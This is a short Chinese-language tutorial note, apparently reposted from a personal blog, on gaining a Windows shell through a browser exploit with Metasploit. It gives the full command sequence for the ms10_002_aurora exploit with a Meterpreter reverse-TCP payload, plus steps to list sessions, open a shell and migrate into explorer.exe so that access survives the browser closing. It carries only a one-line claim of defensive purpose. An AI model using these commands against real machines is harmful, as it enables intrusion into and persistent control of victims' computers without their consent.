7

【笔记】msf通过浏览器获取shell

 2 years ago
source link: https://feiju12138.github.io/2022/06/08/msf%E9%80%9A%E8%BF%87%E6%B5%8F%E8%A7%88%E5%99%A8%E8%8E%B7%E5%8F%96shell/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

【笔记】msf通过浏览器获取shell

2022-06-08

1

msf通过浏览器获取Windows系统shell

本文仅用于网络信息防御学习

msf通过浏览器获取shell

  • ms10002:winxp的getshell漏洞
  • ms12063:win7的getshell漏洞

<ip_local>:配置攻击者地址

msf > use exploit/windows/browser/ms10_002_aurora
msf > set payload windows/meterpreter/reverse_tcp
msf > set SRVHOST <ip_local>
msf > set LHOST <ip_local>
msf > exploit
  • 执行攻击后,会得到一个网址,当受害者访问这个网址后,即可获取shell

1:会话编号

# 查看所有会话
msf > sessions -i

# 使用一个会话
msf > sessions -i 1

# 获取shell
meterpreter > shell
  • 由于受害者关闭浏览器进程后,会话会失效,所以可以移动会话绑定的进程,推荐绑定explorer.exe进程

<pid>:进程的pid

# 使用一个会话
msf > sessions -i 1

# 查看所有进程
meterpreter > ps

# 移动会话绑定的进程
meterpreter > migrate <pid>

哔哩哔哩——千锋教育网络安全学院


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK